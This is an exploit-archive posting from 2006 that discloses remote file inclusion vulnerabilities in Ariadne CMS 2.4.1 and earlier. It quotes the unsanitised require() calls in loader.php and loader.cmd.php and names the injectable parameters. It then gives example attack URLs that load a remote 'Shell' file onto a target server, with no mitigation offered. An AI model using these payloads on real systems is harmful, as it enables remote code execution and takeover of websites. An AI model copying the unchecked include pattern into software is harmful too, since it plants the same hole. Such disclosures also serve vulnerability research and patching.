Home / exploits ariadne-rfi.txt
Posted on 07 November 2006
******************************************************************************* # Title : Ariadne <= 2.4.1 Multiple Remote File Include Vulnerabilities # Author : ajann # Script Page : http://www.ariadne-cms.org/en/download/ # Vuln; ******************************************************************************* [Files] loader.php loader.cmd.php [/Files] [Code,1] loader.php Error: .. .... require($ariadne."/configs/ariadne.phtml"); require($ariadne."/configs/ftp/$configfile"); require($ariadne."/configs/store.phtml"); require($ariadne."/includes/loader.ftp.php"); require($ariadne."/configs/sessions.phtml"); require($ariadne."/stores/".$store_config["dbms"]."store.phtml"); require($ariadne."/nls/en"); require($ariadne."/modules/mod_mimemagic.php"); require($ariadne."/modules/mod_virusscan.php"); .... .. Key [:] ariadne=[file] Key [:] store_config[code]=[file] Example: http://target.com/path/ftp/loader.php?ariadne=Shell http://target.com/path/lib/includes/loader.cmd.php?store_config[code]=Shell .... # ajann,Turkey # ... # Im not Hacker!